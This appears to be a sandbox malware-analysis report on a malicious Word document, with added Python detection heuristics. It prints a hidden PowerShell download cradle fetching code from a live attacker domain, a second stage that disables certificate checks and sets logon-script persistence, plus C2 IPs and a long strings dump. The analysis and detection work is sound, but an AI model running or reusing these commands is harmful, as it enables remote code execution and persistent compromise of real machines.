      "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
      "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
      "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
      "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
      source
      Hook Detection
      relevance
      10/10
  • Unusual Characteristics
    • Reads information about supported languages
      details
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
      "WINWORD.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL\GEO"; Key: "NATION")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000402")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000403")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000404")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000405")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000406")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000407")
      "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000408")
      source
      Registry Access
      relevance
      3/10

File Details

All Details:

759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx

Filename
759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx
Size
50KiB (51046 bytes)
Type
docx office
Description
Microsoft Word 2007+
Architecture
WINDOWS
SHA256
759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6
MD5
34dc9a69f33ba93e631cd5048d9f2624
SHA1
68c2809560c7623d2307d8797691abf3eafe319a

Classification (TrID)

  • 88.7% (.DOCX) Word Microsoft Office Open XML Format document
  • 11.2% (.ZIP) ZIP compressed archive

Hybrid Analysis

Analysed 4 processes in total (System Resource Monitor).

  • WINWORD.EXE /n "C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx" (PID: 3996)
    • powershell.exe C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a (PID: 2460, Additional Context: System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;)
      • powershell.exe -enc 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 (PID: 1420, Additional Context: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='C:\Windows'+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;)
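
The process chain above (Word spawning PowerShell through a `MSWord.exe\..\..\..\..` relative path, a hidden-window download cradle, a `-enc` second stage that disables TLS certificate validation and writes `HKCU:\Environment\UserInitMprLogonScript` for logon persistence) can be turned into process-creation detection logic. The block below is an added example and not code from the sandbox report: the `ProcessEvent` records, their field names and the sample events are constructed. The first command line is the one the report recorded; the second-stage text is reconstructed from the fragment the report shows under "Additional Context", since the real `-enc` payload is not on the page.

```python
"""Detection heuristics for the Word -> PowerShell -> logon-script chain above.

Added example, not code from the sandbox report. The ProcessEvent records,
their field names and the sample events below are constructed for this
example; the first command line is copied from the report, the second
stage is reconstructed from the fragment shown under "Additional Context".
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e / -ec / -enc / -EncodedCommand followed by its argument.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+(\S+)")
# Abused here for persistence: the value is run at every interactive logon.
LOGON_SCRIPT_VALUE = "UserInitMprLogonScript"


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE text behind -enc, or None if absent or not a literal."""
    m = ENC_FLAG.search(command_line)
    if not m or not re.fullmatch(r"[A-Za-z0-9+/=]+", m.group(1)):
        return None  # e.g. "-enc $e": the payload is a variable, not base64
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: ProcessEvent) -> List[str]:
    """Return the indicator names that fire for one process-creation event."""
    findings = []
    cmd = event.command_line
    # Scan the decoded -enc payload with the same rules as the visible command line.
    text = cmd + "\n" + (decode_encoded_command(cmd) or "")
    if event.parent_image.lower() in OFFICE_PARENTS and event.image.lower() == "powershell.exe":
        findings.append("office-spawned-powershell")
    if re.search(r"\\\.\.\\", cmd):  # MSWord.exe\..\..\ trick to reach System32
        findings.append("path-traversal-in-image-path")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd):
        findings.append("hidden-window")
    if ENC_FLAG.search(cmd):
        findings.append("encoded-command")
    if re.search(r"(?i)downloadstring|downloadfile|net\.webclient", text):
        findings.append("web-download-cradle")
    if re.search(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", text):
        findings.append("tls-validation-disabled")
    if LOGON_SCRIPT_VALUE.lower() in text.lower():
        findings.append("logon-script-persistence")
    return findings


# Second stage as reconstructed from the report's "Additional Context" fragment.
STAGE2 = (
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
    "if (Test-Path $p) { New-ItemProperty -Path 'HKCU:\\Environment' "
    "-Name 'UserInitMprLogonScript' -Value \"$p_bat\" -PropertyType String -Force | Out-Null }"
)
STAGE2_ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed; the first command line is the one the report recorded
    ProcessEvent(
        "WINWORD.EXE", "powershell.exe",
        r"C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell"
        r"\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient)"
        r".DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e",
    ),
    ProcessEvent("powershell.exe", "powershell.exe", "powershell.exe -enc " + STAGE2_ENCODED),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{ev.parent_image} -> {ev.image}: {analyse(ev) or 'clean'}")
```

The first event fires on parent/child relationship, path traversal, hidden window, the `-enc` flag and the download cradle; the second only becomes visible once the `-enc` payload is decoded, which is why the decoded text is scanned with the same rules. The benign `explorer.exe -> powershell.exe` event produces nothing.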

Network Analysis

DNS Requests

Domain | Address | Registrar | Country
satellitedeluxpanorama.com | 89.34.111.160 | Tucows Domains Inc. (Name Server: NS1.NJAL.LA; Creation Date: Fri, 20 Oct 2017 11:25:22 GMT) | Belize
sendmevideo.org | 86.106.93.113 | PDR Ltd. d/b/a PublicDomainRegistry.com | Belize

Contacted Hosts

IP Address | Port/Protocol | Associated Process | Country
86.106.93.113 | 80/TCP | powershell.exe (PID: 2460), powershell.exe (PID: 1420) | Belize
172.217.22.46 | 443/TCP | rundll32.exe (PID: 1968) | United States
89.34.111.160 | 443/TCP | rundll32.exe (PID: 1968) | Belize

HTTP Traffic

Endpoint | Request URL
86.106.93.113:80 (sendmevideo.org) | GET /dh2025e/eee.txt
86.106.93.113:80 (sendmevideo.org) | GET /dh2025e/eh.dll

Suricata Alerts

Event | Category | Description | SID
86.106.93.113 -> local:63543 (TCP) | Misc activity | ET INFO Packed Executable Download | 2014819
86.106.93.113 -> local:63543 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959
86.106.93.113 -> local:63543 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538
ET rules applied using Suricata.
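
The two GETs above carry only `Host` and `Connection`, the first answer is `text/plain` holding the base64 second stage, and the second answer is an `application/octet-stream` body starting with `MZ`. The block below is an added example, not part of the report and not the ET rule logic itself: it parses constructed request/response pairs shaped like those exchanges and applies checks that mirror what the three alert descriptions say (minimal request headers, a PE image in the body, a text body that is one base64 blob of UTF-16LE PowerShell). The sample bytes, the stand-in stage text and the function names are constructed for this example.

```python
"""Re-derive the three Suricata findings from raw HTTP exchanges.

Added example, not part of the report or of the ET rule set. The sample
request/response bytes, the stand-in stage text and the PE stub are
constructed to resemble the two GETs recorded in the report.
"""
import base64
import re
import struct
from typing import Dict, List, Tuple

HttpMessage = Tuple[str, Dict[str, str], bytes]


def parse_http(raw: bytes) -> HttpMessage:
    """Split one HTTP/1.1 message into (start line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def is_minimal_request(headers: Dict[str, str]) -> bool:
    """No User-Agent and no Accept: the cue named in the 'Minimal HTTP Headers' alert."""
    return "user-agent" not in headers and "accept" not in headers


def is_pe_image(body: bytes) -> bool:
    """MZ header whose e_lfanew points at a PE\\0\\0 signature (the 'PE EXE or DLL' cue)."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    return body[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_b64_powershell(body: bytes):
    """Decode a body that is a single base64 blob of UTF-16LE PowerShell, else None."""
    blob = body.strip()
    if not blob or not re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", blob):
        return None
    try:
        text = base64.b64decode(blob).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if re.search(r"\$\w+|New-Object|Invoke-\w+|-ItemProperty", text) else None


def classify_exchange(request: bytes, response: bytes) -> List[str]:
    """Return the findings for one request/response pair."""
    _, req_headers, _ = parse_http(request)
    _, resp_headers, body = parse_http(response)
    findings = []
    if is_minimal_request(req_headers):
        findings.append("minimal-request-headers")
    if is_pe_image(body):
        findings.append("pe-executable-body")
    if resp_headers.get("content-type", "").startswith("text/plain") and decode_b64_powershell(body):
        findings.append("base64-powershell-in-text-body")
    return findings


def _response(content_type: str, body: bytes) -> bytes:
    """Build a minimal 200 response shaped like the Apache answers in the report."""
    return (f"HTTP/1.1 200 OK\r\nServer: Apache/2.4.6 (CentOS)\r\nContent-Type: {content_type}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode("latin-1") + body


# Constructed samples; STAGE_TEXT is a stand-in, not the payload served by eee.txt.
STAGE_TEXT = "$c=New-Object System.Net.WebClient;$c.DownloadFile('http://sendmevideo.org/dh2025e/eh.dll',$p)"
PE_STUB = bytearray(b"MZ" + b"\x00" * 62)      # 64-byte DOS header
struct.pack_into("<I", PE_STUB, 0x3C, 0x40)    # e_lfanew -> offset 0x40
PE_STUB += b"PE\x00\x00" + b"\x00" * 20

SAMPLES = {
    "eee.txt": (b"GET /dh2025e/eee.txt HTTP/1.1\r\nHost: sendmevideo.org\r\nConnection: Keep-Alive\r\n\r\n",
                _response("text/plain; charset=UTF-8", base64.b64encode(STAGE_TEXT.encode("utf-16-le")))),
    "eh.dll": (b"GET /dh2025e/eh.dll HTTP/1.1\r\nHost: sendmevideo.org\r\nConnection: Keep-Alive\r\n\r\n",
               _response("application/octet-stream", bytes(PE_STUB))),
    "benign": (b"GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n",
               _response("text/html", b"<html><body>hello</body></html>")),
}

if __name__ == "__main__":
    for name, (req, resp) in SAMPLES.items():
        print(name, classify_exchange(req, resp) or ["clean"])
```

Checking the PE signature through `e_lfanew` rather than only the two `MZ` bytes avoids flagging any body that happens to start with "MZ"; the base64 check is deliberately tied to `text/plain`, which is the mismatch that makes a `.txt` fetched by a download cradle worth a second look.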

Extracted Strings

All Details:
!&+eGdxeGdxeGdx
Ansi based on PCAP Processing (network.pcap)
!This program cannot be run in DOS mode.$
Ansi based on PCAP Processing (network.pcap)
"Hw"w P^O;<aY`GkxmPY[g
Ansi based on Dropped File (~WRD0000.tmp)
#c2@XbOvm
Ansi based on PCAP Processing (network.pcap)
$5caa`= &!Cd,E.y6CnHgs0_?V_Nw ,{5Iq{Bl(p_cdS|&PO\UbHcK)KjVkUSD2P
Ansi based on Dropped File (~WRD0000.tmp)
$Equifax Secure Certificate Authority0
Ansi based on PCAP Processing (network.pcap)
$http://g.symcb.com/crls/gtglobal.crl0!
Ansi based on PCAP Processing (network.pcap)
%?nu gPK!/]N word/theme/theme1.xmlY;4.[?%y
Ansi based on Dropped File (~WRD0000.tmp)
%ALLUSERSPROFILE%\mvdrt.dll,#1
Ansi based on Process Commandline (rundll32.exe)
%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll
Unicode based on Runtime Data (WINWORD.EXE )
%s "%s", %s
Unicode based on Dropped File (carved_0.dll.1509628513544)
%s - %lu
Ansi based on Dropped File (carved_0.dll.1509628513544)
'''-''''''''''
Ansi based on Image Processing (screen_6.png)
''-''
Ansi based on Image Processing (screen_3.png)
'j,'u8M#8M#8M
Ansi based on Dropped File (~WRD0000.tmp)
)@_^J26)6
Ansi based on PCAP Processing (network.pcap)
)http://crl.geotrust.com/crls/secureca.crl0N
Ansi based on PCAP Processing (network.pcap)
*.android.com
Ansi based on PCAP Processing (network.pcap)
*.appengine.google.com
Ansi based on PCAP Processing (network.pcap)
*.cloud.google.com
Ansi based on PCAP Processing (network.pcap)
*.db833953.google.cn
Ansi based on PCAP Processing (network.pcap)
*.gcp.gvt2.com
Ansi based on PCAP Processing (network.pcap)
*.google-analytics.com
Ansi based on PCAP Processing (network.pcap)
*.google.ca
Ansi based on PCAP Processing (network.pcap)
*.google.cl
Ansi based on PCAP Processing (network.pcap)
*.google.co.in
Ansi based on PCAP Processing (network.pcap)
*.google.co.jp
Ansi based on PCAP Processing (network.pcap)
*.google.co.uk
Ansi based on PCAP Processing (network.pcap)
*.google.com
Ansi based on PCAP Processing (network.pcap)
*.google.com.ar
Ansi based on PCAP Processing (network.pcap)
*.google.com.au
Ansi based on PCAP Processing (network.pcap)
*.google.com.br
Ansi based on PCAP Processing (network.pcap)
*.google.com.co
Ansi based on PCAP Processing (network.pcap)
*.google.com.mx
Ansi based on PCAP Processing (network.pcap)
*.google.com.tr
Ansi based on PCAP Processing (network.pcap)
*.google.com.vn
Ansi based on PCAP Processing (network.pcap)
*.google.com0Y0
Ansi based on PCAP Processing (network.pcap)
*.google.de
Ansi based on PCAP Processing (network.pcap)
*.google.es
Ansi based on PCAP Processing (network.pcap)
*.google.fr
Ansi based on PCAP Processing (network.pcap)
*.google.hu
Ansi based on PCAP Processing (network.pcap)
*.google.it
Ansi based on PCAP Processing (network.pcap)
*.google.nl
Ansi based on PCAP Processing (network.pcap)
*.google.pl
Ansi based on PCAP Processing (network.pcap)
*.google.pt
Ansi based on PCAP Processing (network.pcap)
*.googleadapis.com
Ansi based on PCAP Processing (network.pcap)
*.googleapis.cn
Ansi based on PCAP Processing (network.pcap)
*.googlecommerce.com
Ansi based on PCAP Processing (network.pcap)
*.googlevideo.com
Ansi based on PCAP Processing (network.pcap)
*.gstatic.cn
Ansi based on PCAP Processing (network.pcap)
*.gstatic.com
Ansi based on PCAP Processing (network.pcap)
*.gvt1.com
Ansi based on PCAP Processing (network.pcap)
*.gvt2.com
Ansi based on PCAP Processing (network.pcap)
*.metric.gstatic.com
Ansi based on PCAP Processing (network.pcap)
*.urchin.com
Ansi based on PCAP Processing (network.pcap)
*.url.google.com
Ansi based on PCAP Processing (network.pcap)
*.youtube-nocookie.com
Ansi based on PCAP Processing (network.pcap)
*.youtube.com
Ansi based on PCAP Processing (network.pcap)
*.youtubeeducation.com
Ansi based on PCAP Processing (network.pcap)
*.ytimg.com
Ansi based on PCAP Processing (network.pcap)
,_,_.
Ansi based on Image Processing (screen_6.png)
,__,,
Ansi based on Image Processing (screen_0.png)
-'--'-
Ansi based on Image Processing (screen_3.png)
-enc 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
Ansi based on Process Commandline (powershell.exe)
-https://www.geotrust.com/resources/repository0
Ansi based on PCAP Processing (network.pcap)
.:N#H
Ansi based on Dropped File (~WRD0000.tmp)
.edata
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$2
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$3
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$4
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$5
Ansi based on Dropped File (carved_0.dll.1509628513544)
.idata$6
Ansi based on Dropped File (carved_0.dll.1509628513544)
.MfIZUq"=loO.Y$m.+gAT!,MQH(XI\qZbaG;_K
Ansi based on Dropped File (~WRD0000.tmp)
.rdata
Ansi based on Dropped File (carved_0.dll.1509628513544)
.rdata$zzzdbg
Ansi based on PCAP Processing (network.pcap)
.rsrc
Ansi based on Dropped File (carved_0.dll.1509628513544)
.rsrc$01
Ansi based on Dropped File (carved_0.dll.1509628513544)
.rsrc$02
Ansi based on Dropped File (carved_0.dll.1509628513544)
.text
Ansi based on Dropped File (carved_0.dll.1509628513544)
.text$mn
Ansi based on Dropped File (carved_0.dll.1509628513544)
.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!=lgtdocProps/core.xml (RN0}7YH$o@e0{V{6}WeTTz=%y|G"5LW0-<
Ansi based on Dropped File (~WRD0002.tmp)
.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!_DMtdocProps/core.xml (RN0}7Y`$jxD^uM[w+fL|sO;"uS@J*<'\K^T0,
Ansi based on Dropped File (~WRD0000.tmp)
/dh2025e/eee.txt
Ansi based on PCAP Processing (PCAP)
/dh2025e/eh.dll
Ansi based on PCAP Processing (PCAP)
/n "C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx"
Ansi based on Process Commandline (WINWORD.EXE)
/x#,/d}?eh7)mg;kk4Df2/wBmw4A^#FkPHxAt~9'ozWnMtVWkJlNWz^>\PK!yUword/document.xmlVKo8/@=X'udshj)rPXF$mwuqa>fIp_lJT *_o.+T0
Ansi based on Dropped File (~WRD0000.tmp)
0"0?0P0g0y0
Ansi based on PCAP Processing (network.pcap)
0/EEa}@+Du7Lcc@M+.!}!$ OuRIdHA(1x$u#Qx2R*XLOP[nDY3+L!H?%kE
Ansi based on Dropped File (~WRD0000.tmp)
020521040000Z
Ansi based on PCAP Processing (network.pcap)
042dsDl>
Ansi based on PCAP Processing (network.pcap)
0___D',0_0___'_ee8_
Ansi based on Image Processing (screen_3.png)
12493
Unicode based on Dropped File (carved_0.dll.1509628513544)
170522113237Z
Ansi based on PCAP Processing (network.pcap)
171024090717Z
Ansi based on PCAP Processing (network.pcap)
171030134419Z
Ansi based on PCAP Processing (network.pcap)
171229000000Z0f1
Ansi based on PCAP Processing (network.pcap)
180821040000Z0B1
Ansi based on PCAP Processing (network.pcap)
181231235959Z0I1
Ansi based on PCAP Processing (network.pcap)
1`2"7BAoGm)TrJ(A^%>f+hOO3`=VEs9kA"(-$gkm,w"F,#SC`n[J(%
Ansi based on Dropped File (~WRD0000.tmp)
2-01-3cf7-0009
Ansi based on PCAP Processing (network.pcap)
21171006134419Z0t1
Ansi based on PCAP Processing (network.pcap)
2D2X2i2w2
Ansi based on PCAP Processing (network.pcap)
3*313?3T3<4N4
Ansi based on PCAP Processing (network.pcap)
3U3k3s3z3
Ansi based on PCAP Processing (network.pcap)
4"4/4<4N4
Ansi based on PCAP Processing (network.pcap)
4.5O5^5l5z5
Ansi based on PCAP Processing (network.pcap)
433j238bG*Dc=Iod%rD\'<DbQ|
Ansi based on Dropped File (~WRD0000.tmp)
49Ds7 !|V>7rtx3iQ!V$
Ansi based on Dropped File (~WRD0000.tmp)
5"5/5<5K5x5
Ansi based on PCAP Processing (network.pcap)
5(FSrgC4YTrsB,i1j!u'66@AP\?F.sNlt<>=9^Q*pOC4Jew"i3!zCIa~.4K+}ip{:Z|cIy]?pkXN2
Ansi based on Dropped File (~WRD0000.tmp)
6&6^6p6}6
Ansi based on PCAP Processing (network.pcap)
6iD_,|uZ^ty;!Y,}{C/h>PK!|;9"word/_rels/document.xml.rels (MO0&V]5-Sht
Ansi based on Dropped File (~WRD0000.tmp)
7%858B8P8a8
Ansi based on PCAP Processing (network.pcap)
7A7S7`7m7
Ansi based on PCAP Processing (network.pcap)
7gu"lV
Ansi based on Dropped File (carved_0.dll.1509628513544)
7PXd}Wt]tsso*UM\x@wAm`8TQkPp<Nw.4875TZ(ZG[iF?h;gy)vPK!5Iword/settings.xmlVn8}/`yIoSmQ@IM7;$(ihOg~+M_FE
Ansi based on Dropped File (~WRD0000.tmp)
7s9f__agla78_e_3s71saf_a84686a84g3f39O14aea7lda_6869d_
Ansi based on Image Processing (screen_6.png)
9;5AT7_CMjFD4x#@74x#@2x#XdmZo,To
Ansi based on Dropped File (~WRD0000.tmp)
9AMFP97ex#@CAoDD74x#@2x#XdmZo,To
Ansi based on Dropped File (~WRD0000.tmp)
9AMFPoJ5x#@07_9W%M7"q."kx#@dyx#@dmPl(xS
Ansi based on Dropped File (~WRD0000.tmp)
:___-,-
Ansi based on Image Processing (screen_6.png)
< <.<R<]<k<
Ansi based on PCAP Processing (network.pcap)
<0<;<P<X<`<~<
Ansi based on PCAP Processing (network.pcap)
<9SZ}}iDc
Ansi based on PCAP Processing (network.pcap)
<h1>Not Found</h1>The requested URL // was not found on this server.
Ansi based on Dropped File (VRzZ5.vnd[1].txt)
<xI1n
Ansi based on Dropped File (carved_0.dll.1509628513544)
='I ZRPGQh6\lFXt778Co5(h5({pm[{v?~
Ansi based on Dropped File (~WRD0000.tmp)
=1d){%}wofjQr??.z/L?1Z?o)IK9Ka:6|'1M1%Y,P,#X'kD7_rH&.+$+I'<ewZ0t=G5w2(ql|FQ&Q3,=cXWXv=%3[H+
Ansi based on Dropped File (~WRD0000.tmp)
=I]B,lD@=VSk(]&(f2:tSiX30IQbU`MZ9UBrFL+b2cyP.
Ansi based on Dropped File (~WRD0000.tmp)
>/>6>P>i>q>
Ansi based on PCAP Processing (network.pcap)
>`~{`PNfQS];6#6jwVt0xrQCM_-oiv
Ansi based on Dropped File (~WRD0000.tmp)
>FY!OGPRW<s@4S:>Y;^UW+Kn|6SD3EG-XVNinjkR}v!{GNGVlenomUCIw]]w-]rU|!zvzm{:BkMzfA(5'BbaPSK\-L`b$AK8JI,
Ansi based on Dropped File (~WRD0000.tmp)
>iWb[gDhzJBewmW&, fcmA@F[&G/3bj<ML@F[Kjb>g??ky.,z22pBWA=+3SA:*P.v5~ol8S-wt`LET
Ansi based on Dropped File (~WRD0000.tmp)
?______J
Ansi based on Image Processing (screen_0.png)
?_O-~\Tn`z&{(
Ansi based on PCAP Processing (network.pcap)
@%z:pov<t..P/LmTLz5qdFhMFhDFh$wD##1-\*:Zw"O(t]F=$,8epj9=\,Y"vgF;{&
Ansi based on Dropped File (~WRD0000.tmp)
@.data
Ansi based on Dropped File (carved_0.dll.1509628513544)
@.reloc
Ansi based on Dropped File (carved_0.dll.1509628513544)
@Arial Unicode MS
Unicode based on Runtime Data (WINWORD.EXE )
@Batang
Unicode based on Runtime Data (WINWORD.EXE )
@BatangChe
Unicode based on Runtime Data (WINWORD.EXE )
@DFKai-SB
Unicode based on Runtime Data (WINWORD.EXE )
@Dotum
Unicode based on Runtime Data (WINWORD.EXE )
@DotumChe
Unicode based on Runtime Data (WINWORD.EXE )
@FangSong
Unicode based on Runtime Data (WINWORD.EXE )
@Gulim
Unicode based on Runtime Data (WINWORD.EXE )
@GulimChe
Unicode based on Runtime Data (WINWORD.EXE )
@Gungsuh
Unicode based on Runtime Data (WINWORD.EXE )
@GungsuhChe
Unicode based on Runtime Data (WINWORD.EXE )
@KaiTi
Unicode based on Runtime Data (WINWORD.EXE )
@Malgun Gothic
Unicode based on Runtime Data (WINWORD.EXE )
@Meiryo
Unicode based on Runtime Data (WINWORD.EXE )
@Meiryo UI
Unicode based on Runtime Data (WINWORD.EXE )
@Microsoft JhengHei
Unicode based on Runtime Data (WINWORD.EXE )
@Microsoft YaHei
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU_HKSCS
Unicode based on Runtime Data (WINWORD.EXE )
@MingLiU_HKSCS-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
@MS Gothic
Unicode based on Runtime Data (WINWORD.EXE )
@MS Mincho
Unicode based on Runtime Data (WINWORD.EXE )
@MS PGothic
Unicode based on Runtime Data (WINWORD.EXE )
@MS PMincho
Unicode based on Runtime Data (WINWORD.EXE )
@MS UI Gothic
Unicode based on Runtime Data (WINWORD.EXE )
@NSimSun
Unicode based on Runtime Data (WINWORD.EXE )
@PMingLiU
Unicode based on Runtime Data (WINWORD.EXE )
@PMingLiU-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
@SimHei
Unicode based on Runtime Data (WINWORD.EXE )
@SimSun
Unicode based on Runtime Data (WINWORD.EXE )
@SimSun-ExtB
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D353DC2DAD29B0][O00000000]*C:\
Unicode based on Runtime Data (WINWORD.EXE )
[F00000000][T01D353DC2DB036F0][O00000000]*C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx
Unicode based on Runtime Data (WINWORD.EXE )
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='%WINDIR%\+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
Ansi based on Process Commandline (00040970-00001420)
\JeL{Q*Fj[q]SIrK+\ri+^%%J@{G3r?hR[ozb4f@/^Uc""P|}~6}1oV:DHp*;\)4{uw%n0,vB9)MbdY:]}0,N%d7I 4PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I
Ansi based on Dropped File (~WRD0002.tmp)
\JeL{QJ*[r]SI2%x.MHNRtfgV@
Ansi based on Dropped File (~WRD0000.tmp)
]3j%L]CBr#7@>KVkZ^-d ukW.+"p!
Ansi based on Dropped File (~WRD0000.tmp)
^@5)mDYq/bfdMRMVs*Bc.cl%(r]3,R~<!
Ansi based on Dropped File (~WRD0000.tmp)
^aQFldee2nVA=t8`7M:liA%JE\F/ }D\.zrSu1FxlEmZUAs7g?d.1?{:.|hc
Ansi based on Dropped File (~WRD0000.tmp)
_'iard__O
Ansi based on Image Processing (screen_3.png)
_0,,J
Ansi based on Image Processing (screen_0.png)
_0_,,
Ansi based on Image Processing (screen_0.png)
_::_::_
Ansi based on Image Processing (screen_3.png)
_;-_'_-_'',_'t-_-,t-_-,
Ansi based on Image Processing (screen_3.png)
_?m?J?_?_,q_?_,?_??_m??_?_v____,_,_
Ansi based on Image Processing (screen_0.png)
__''_''__
Ansi based on Image Processing (screen_6.png)
___'__
Ansi based on Image Processing (screen_6.png)
___1i___'c_.crti_'._c_'c_
Ansi based on Image Processing (screen_3.png)
____8,0
Ansi based on Image Processing (screen_6.png)
_____
Ansi based on Image Processing (screen_6.png)
________
Ansi based on Image Processing (screen_6.png)
_______Find_
Ansi based on Image Processing (screen_3.png)
____ln
Ansi based on Image Processing (screen_6.png)
___P_
Ansi based on Image Processing (screen_6.png)
__g__
Ansi based on Image Processing (screen_6.png)
__Replace
Ansi based on Image Processing (screen_3.png)
_a9i;
Ansi based on Image Processing (screen_6.png)
_COpY
Ansi based on Image Processing (screen_3.png)
_diting
Ansi based on Image Processing (screen_6.png)
_i8_0_
